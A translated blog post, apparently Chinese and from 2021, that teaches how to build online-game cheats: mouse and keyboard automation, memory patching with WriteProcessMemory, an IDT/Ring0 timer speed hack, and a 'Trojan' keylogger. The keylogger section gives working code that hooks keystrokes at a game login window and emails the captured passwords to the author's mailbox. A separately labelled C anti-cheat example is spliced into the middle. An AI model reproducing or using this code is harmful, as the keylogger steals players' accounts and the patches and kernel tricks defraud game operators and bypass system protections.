Four ways to build online game cheats ("plug-ins"), by mprogramer

xiaoxiao, 2021-03-06

A few years ago I watched other people using cheats in online games, and as a programmer it bothered me not to know what was going on. I spent some time studying them, gained some first-hand experience, and want to share it with everyone. There are roughly four kinds of cheat, listed in order of how hard they are to build:

1. Action cheats. These use Windows API calls to send commands to the game window, or to drive the mouse and keyboard, so that the character walks or attacks on its own. The earliest "Stone Age" cheats worked this way. (This kind is pure garbage, TMD; anyone who knows a few API functions can see how it is done. Still, it is a good entry-level exercise: it won't raise your combat power, but it will raise your morale.)

2. Local modification. These work like the classic single-player game trainers. Writing one only needs a basic grasp of memory addresses and a handful of API calls; the "Elf" cheats were of this kind. The hard part is not the code but finding the addresses, which usually means using other people's tools, and some games keep two copies of a value and check them against each other, which makes the addresses harder to find. (Harder than the first kind, but this one is actually usable, and it quickly improves your understanding of memory addresses, which is good for your programming skills.)

3. Trojans. The purpose of this kind of "cheat" is to steal the user's password for the cheat author. ("Bad" is the only word for it, TMD, but you have to know how it works to be able to talk about it.) It takes some effort: you need hooking or keyboard-monitoring techniques as a foundation. The principle is to capture the user's account name or password and then send it to a preset mailbox. (I have written something like this before, but I have never used it. I know this kind of thing is very unethical, so don't use it!)
4. Acceleration. These speed up the game itself. (Sorry everyone, I hadn't actually done this one when I started writing, so I can't speak from much experience; embarrassing.) The first three kinds are easier to write in languages such as VB or Delphi; VC is the better tool when you need lower-level support.

Action cheats

Let me start with action cheats, the easiest kind and the first one I wrote. Back in the "Stone Age" days I saw someone running a piece of software (a cheat) that let them do things in the game I couldn't (at the time I didn't even know what a cheat was), so I got hold of it. People told me it wasn't hard to reproduce, and indeed it isn't: the character walks to wherever the mouse is clicked, so simulating the mouse is enough. On an impulse I ran to MSDN and found that a few simple API functions do the job:

1. First we need to know the current mouse position (so we can restore it afterwards). Use GetCursorPos:

BOOL GetCursorPos(LPPOINT lpPoint); // address of structure for cursor position

2. Move the mouse to the target position with SetCursorPos:

BOOL SetCursorPos(int X,  // horizontal position
                  int Y); // vertical position

3. Simulate the mouse press and release actions with mouse_event:

VOID mouse_event(DWORD dwFlags,      // flags specifying various motion/click variants
                 DWORD dx,          // horizontal mouse position or position change
                 DWORD dy,          // vertical mouse position or position change
                 DWORD dwData,      // amount of wheel movement
                 DWORD dwExtraInfo); // 32 bits of application-defined information

The events available in dwFlags include MOUSEEVENTF_MOVE (move the mouse), MOUSEEVENTF_LEFTDOWN (left button down) and MOUSEEVENTF_LEFTUP (left button up); check MSDN for the rest. With that, let's see how the character is moved:

GetCursorPos(Point);
SetCursorPos(RanPoint(80, WindowX), RanPoint(80, WindowY)); // RanPoint is a home-made random coordinate function
mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0);
mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0);
SetCursorPos(Point.x, Point.y);

Look at the code above: isn't moving the character simple? A lot of good stuff can be built with this trick (as I said, TMD, this is the garbage approach, believe me). Next, automatic attack (this requires the game to have an attack hotkey). The principle is the same, only the API differs: this time we use keybd_event, whose usage is:

VOID keybd_event(BYTE bVk,           // virtual-key code
                 BYTE bScan,         // hardware scan code
                 DWORD dwFlags,      // flags specifying various function options
                 DWORD dwExtraInfo); // additional data associated with keystroke

The scan code cannot be used directly; the virtual-key code is turned into a scan code with MapVirtualKey, whose usage is:

UINT MapVirtualKey(UINT uCode,     // virtual-key code or scan code
                   UINT uMapType); // translation to perform

OK, suppose the attack hotkey is Ctrl+A. The actual code looks like this:

keybd_event(VK_CONTROL, MapVirtualKey(VK_CONTROL, 0), 0, 0);
keybd_event(65, MapVirtualKey(65, 0), 0, 0);
keybd_event(65, MapVirtualKey(65, 0), KEYEVENTF_KEYUP, 0);
keybd_event(VK_CONTROL, MapVirtualKey(VK_CONTROL, 0), KEYEVENTF_KEYUP, 0);

First simulate pressing Ctrl, then pressing A, then releasing A, and finally releasing Ctrl: that is one simulated hotkey cycle. (By now you should have a fair understanding of simple cheats. Want to try? If you imitate this you can build better stuff; how far you get depends on your comprehension. But don't get happy too early, there is more complex stuff waiting for you.)

Local modification cheats

Now let's look in detail at the whole production process of a more advanced kind of cheat, local modification. The most typical application of it I know is the game "Elf". A few years ago, when Elf was still in testing, many colleagues at my company played it, so I looked at how the game processed its data. I found that the information it sent to the server sat in memory first (my first reaction: modifying this game is like modifying a single-player game; in other words, the memory could be modified before the client submitted the information to the server). I found the address, modified it as planned so that the client submitted the changed value automatically, and it really worked.
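The "double address check" that the article says Elf introduced afterwards, as an added C illustration constructed for this page (not the game's code and not from the original post): a value is kept at two addresses, one XOR-masked, plus a checksum, so a cheat that rewrites only the one address it found fails the check on the next read. All type and function names, the mask and the forged value are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>

/* Constructed example of a "double address check": a counter the game keeps
 * in memory is stored twice (one copy XOR-masked) plus a checksum, so a
 * WriteProcessMemory cheat that rewrites only the address it found is
 * caught on the next read. Hypothetical names; not any real game's code. */
typedef struct {
    uint32_t value;     /* plain copy: what a memory scanner finds */
    uint32_t mirror;    /* second copy, masked so a scan for the plain value misses it */
    uint32_t checksum;  /* mix of both copies */
} guarded_u32;

#define MIRROR_MASK 0xA5A5A5A5u

/* FNV-1a style mix of the two copies; for a fixed second argument this is a
 * bijection of the first, so two different values never share a checksum. */
static uint32_t guard_sum(uint32_t a, uint32_t b) {
    uint32_t h = 2166136261u;
    h = (h ^ a) * 16777619u;
    h = (h ^ b) * 16777619u;
    return h;
}

/* Every legitimate write goes through here and updates all three fields. */
void guarded_set(guarded_u32 *g, uint32_t v) {
    g->value = v;
    g->mirror = v ^ MIRROR_MASK;
    g->checksum = guard_sum(g->value, g->mirror);
}

/* Returns true and stores the value in *out only if both copies agree and
 * the checksum matches; false means something changed the memory behind
 * the game's back, and the client should refuse to use or submit it. */
bool guarded_get(const guarded_u32 *g, uint32_t *out) {
    if (g->checksum != guard_sum(g->value, g->mirror)) return false;
    if ((g->mirror ^ MIRROR_MASK) != g->value) return false;
    *out = g->value;
    return true;
}

/* Models what the article's cheat does: overwrite only the first address. */
void patch_first_copy_only(guarded_u32 *g, uint32_t forged) {
    g->value = forged;
}

/* Scenario: set a legitimate value, read it back, then patch one copy.
 * Returns 1 if the legitimate read succeeds and the patched read is rejected. */
int demo_single_copy_patch_detected(void) {
    guarded_u32 g;
    uint32_t out = 0;
    guarded_set(&g, 1000u);
    if (!guarded_get(&g, &out) || out != 1000u) return 0;
    patch_first_copy_only(&g, 999999u);   /* constructed forged amount */
    return guarded_get(&g, &out) ? 0 : 1;
}
```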
Later Elf switched to a double-address check, memory checksums and so on, which I won't ramble on about here. OK, let's see how this kind of cheat is made. Before writing one we need a concrete understanding of Windows memory: the addresses we talk about are offsets within the process, that is, relative memory, and to modify them we need several Windows APIs. Let's follow an example and look at how the cheat is built and how the APIs are used (so as not to disrupt the online game, I won't explain in detail how the memory addresses are found):

1. Use FindWindow to get the handle of the game window, because we need the process ID of the running game:

HWND FindWindow(LPCTSTR lpClassName,   // pointer to class name
                LPCTSTR lpWindowName); // pointer to window name

2. Use GetWindowThreadProcessId to get the process ID of the process that owns the window:

DWORD GetWindowThreadProcessId(HWND hWnd,               // handle of window
                               LPDWORD lpdwProcessId);  // address of variable for process identifier

3. With the process ID, open the process with the highest access rights using OpenProcess:

HANDLE OpenProcess(DWORD dwDesiredAccess, // access flag
                   BOOL bInheritHandle,   // handle inheritance flag
                   DWORD dwProcessId);    // process identifier

dwDesiredAccess is where the access mode is set. There are many permissions, but here we simply open the process with PROCESS_ALL_ACCESS; check MSDN for the other ways.

4. Once the process is open we can operate on it. Here we use WriteProcessMemory to write data to a memory address (other operations, such as ReadProcessMemory, I won't introduce here):

BOOL WriteProcessMemory(HANDLE hProcess,                 // handle to process whose memory is written to
                        LPVOID lpBaseAddress,            // address to start writing to
                        LPVOID lpBuffer,                 // pointer to buffer holding the data to write
                        DWORD nSize,                     // number of bytes to write
                        LPDWORD lpNumberOfBytesWritten); // actual number of bytes written

5. Finally close the process handle with CloseHandle.

That is how this type of cheat is implemented for some games. Now that we have a theoretical picture, let's look at an actual example to make it concrete. Below is the cheat code for game XX; study it against the steps above:

const
  ResourceOffset: dword = $004219F4;
  Resource: dword = 3113226621;
  ResourceOffset1: dword = $004219F8;
  Resource1: dword = 1940000000;
  ResourceOffset2: dword = $0043FA50;
  Resource2: dword = 1280185;
  ResourceOffset3: dword = $0043FA54;
  Resource3: dword = 3163064576;
  ResourceOffset4: dword = $0043FA58;
  Resource4: dword = 2298478592;
var
  hw: HWND;
  pid: dword;
  h: THandle;
  tt: Cardinal;
begin
  hw := FindWindow('XX', nil);
  if hw = 0 then Exit;
  GetWindowThreadProcessId(hw, @pid);
  h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
  if h = 0 then Exit;
  if flatcheckbox1.Checked = true then
  begin
    WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
    WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);
  end;
  if flatcheckbox2.Checked = true then
  begin
    WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);
    WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);
    WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);
  end;
  MessageBeep(0);
  CloseHandle(h);
  Close;

This game does not verify the data it submits, so writing a cheat for it is not very difficult; the hardest part is finding those addresses.

Trojan cheats

Trojan cheats are, like most Trojans, things that help the cheat author steal accounts and passwords. Because such cheats exist on the net, I have to talk about them today (I personally hate this kind of cheat; please treat this as a look at the technique only, thank you for your cooperation). There are several ways to implement such a program (hooks, keyboard monitoring and other techniques). Because hooking is relatively demanding on the programmer and in practice needs an extra dynamic link library, I will use keyboard monitoring to implement this kind of Trojan in this article.
Keyboard monitoring needs only a single .exe to monitor the keyboard in the background, which suits this program well. Before writing it, we must understand the idea behind the program: 1. Know the title of the login window we want to record. 2. Detect whether the login window has appeared. 3. If it has, log the keyboard. 4. When the window closes, send the recorded information to the programmer's mailbox.

I won't analyse the first point, because it depends on which game you play and what its login window is called. Starting from the second point: how do we judge whether the login window has appeared? It is very simple with FindWindow:

HWND FindWindow(LPCTSTR lpClassName,   // pointer to class name
                LPCTSTR lpWindowName); // pointer to window name

In the actual program we look for the 'XX' window with FindWindow(nil, 'XX'); if the return value is greater than 0 the window has appeared, and we can start recording the keyboard. First we use SetWindowsHookEx to install the monitoring hook, whose usage is:

HHOOK SetWindowsHookEx(int idHook,         // type of hook to install
                       HOOKPROC lpfn,      // address of hook procedure
                       HINSTANCE hMod,     // handle of application instance
                       DWORD dwThreadId);  // identity of thread to install hook for

Note that the HOOKPROC must be a function we write ourselves, and for HINSTANCE we can use the program's own HInstance. Concretely:

HHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);

and the HookProc function is roughly:

function HookProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
begin
  if FindedTitle then // if the window has been found
  begin
    if (PEventMsg(lParam)^.message = WM_KEYDOWN) then // the message is a key press
      hookkey := hookkey + form1.KeyHookResult(PEventMsg(lParam)^.paramL, PEventMsg(lParam)^.paramH);
      // KeyHookResult is a custom function that turns the message parameters into the key name; I will give the conversion at the end of the article
    if Length(hookkey) > 0 then // if we got a key name
    begin
      write(hookkeyfile, hookkey); // write the key name to the text file
      hookkey := '';
    end;
  end;
end;

That is the whole process of recording the keyboard, simple enough. Once you are done recording, don't forget to release the hook with UnhookWindowsHookEx(HHook), where HHook is the handle returned by SetWindowsHookEx. With the keyboard record in hand, all that remains is to send the recorded information back, and we are done. The sending part is not hard either: read the record from the text file and send it with the e-mail component that comes with Delphi. The code is as follows:

AssignFile(readfile, 'hook.txt'); // open the text file hook.txt
Reset(readfile); // open it for reading
while not Eof(readfile) do // read the file
begin
  Readln(readfile, s); // read one line
  body := body + s;
end;
CloseFile(readfile); // close the file
NMSMTP1.EncodeType := uuMime; // set the encoding
NMSMTP1.PostMessage.Attachments.Text := ''; // set the attachments
NMSMTP1.PostMessage.FromAddress := 'xxx@xxx.com'; // set the source address
NMSMTP1.PostMessage.ToAddress.Text := 'xxx@xxx.com'; // set the destination address
NMSMTP1.PostMessage.Body.Text := 'password' + body; // set the mail body
NMSMTP1.PostMessage.Subject := 'password'; // set the subject
NMSMTP1.SendMail; // send the mail

All the functions are now implemented; compile it and try.

Acceleration cheats

I always thought acceleration cheats were written for one particular game. Later I found that idea was wrong: the so-called acceleration cheat actually speeds things up by modifying the clock frequency. People who programmed in the DOS era immediately think this is simple, just reprogram the 8253 timer. That may have worked under DOS, but not under Windows. Windows is a 32-bit operating system,
and it does not let you change whatever you want (Microsoft's stuff is that domineering: if it says you can't change it, you can't). Still, it is not impossible; there are two methods. The first is to write a hardware driver; the second is to do it from Ring0 (the method first used by Chen Ing-hau, the author of CIH; the principle is to modify the IDT, create an interrupt gate, enter Ring0, then trigger the interrupt and restore the vector. For a high-level-language user there is no other way to do this!). The first method is troublesome, so here we use the second. Before implementing it, a look at the plan: 1. Write a procedure with embedded assembly that modifies the IDT, creates the interrupt gate, modifies the vector and so on. 2. Call this procedure to achieve the acceleration. Now the code. First we build the procedure, which is the core of this program:

procedure SetRing(Value: Word); stdcall;
const
  zdh = $03; // the interrupt number to use
var
  IDT: array[0..5] of byte; // holds the IDT register contents
  OG: dword; // stores the old vector
begin
  asm
    push ebx
    sidt IDT                       // read the interrupt descriptor table register
    mov ebx, dword ptr [IDT+2]     // IDT base address
    add ebx, 8*zdh                 // position of our interrupt in the descriptor table
    cli                            // disable interrupts
    mov dx, word ptr [ebx+6]
    shl edx, 16d
    mov dx, word ptr [ebx]
    mov [OG], edx                  // save the old vector
    mov eax, offset @@Ring0        // point at the Ring0-level code
    mov word ptr [ebx], ax         // low 16 bits, stored in bytes 0-1
    shr eax, 16d
    mov word ptr [ebx+6], ax       // high 16 bits, stored in bytes 6-7
    int zdh                        // trigger the interrupt
    mov ebx, dword ptr [IDT+2]     // locate the entry again
    add ebx, 8*zdh
    mov edx, [OG]
    mov word ptr [ebx], dx
    shr edx, 16d
    mov word ptr [ebx+6], dx       // restore the changed vector
    pop ebx
    jmp @@ExitAsm                  // leave the asm block
  @@Ring0:                         // runs at Ring0; this is the real core
    mov al, $34                    // write the 8253 control register
    out $43, al
    mov ax, Value                  // the timer value
    out $40, al                    // write the low byte of the timer value
    mov al, ah
    out $40, al                    // write the high byte of the timer value
    iretd                          // return from the interrupt
  @@ExitAsm:
  end;
end;

The core part is finished; most readers will know what it does, and if you don't, well, huh. Now let's use this procedure to build something like the "shift gears" speed hack. Put a TrackBar control on a form, set its Max to 20, Min to 1 and Position to 10, and write in the control's Change event:

SetRing(StrToInt('$' + IntToStr(1742 + (10 - TrackBar1.Position) * 160)));

Because the default value under Windows is $1742, we use 1742 as the base, and because the larger the value the slower the game runs (and the smaller the faster), I wrote the formula this way. This is a Delphi-with-assembly version of "shift gears" (Win9x only), huh; try it, it's good for you. Under Win2000 we can't do this directly, and Ring0 is out of reach too. Some will think we can write a driver instead, but I'll tell you: Windows 2000 drivers are not VxDs, and a low-skill person like me can't write the WDM drivers Windows uses, so the only option is a ready-made one. PortTalk is a good device driver that makes low-level port operations very convenient, and with it we can do the acceleration cheat. 1. Download the PortTalk driver from its official site, http://www.beyondlogic.org. 2. Copy out the porttalk.sys inside. 3. Build an interface to porttalk.sys (I'll skip this; you can download the .pas file yourself at http://www.freewebs.com/liuyue/porttalk.pas). 4. Implement the acceleration cheat. On this last step: with PortTalk, operating the ports is even easier than under Win98. 1. Create a new project and copy the interface file and porttalk.sys into the project's folder. 2. Add the units to the new project's uses clause: uses Windows, PortTalk, ... 3. Create a procedure:

procedure SetRing(Value: Word);
begin
  if not OpenPortTalk then Exit;
  OutPortB($43, $34);        // write the 8253 control register
  OutPortB($40, Lo(Value));  // low byte of the timer value
  OutPortB($40, Hi(Value));  // high byte of the timer value
  ClosePortTalk;
end;

4. Put a TrackBar control on a form, set its Max to 20, Min to 1 and Position to 10, and write in the control's Change event:

SetRing(StrToInt('$' + IntToStr(1742 + (10 - TrackBar1.Position) * 160)));

It's that easy.

Article Source: Western E Net

When reposting, please cite the original URL: https://www.9cbs.com/read-90708.html
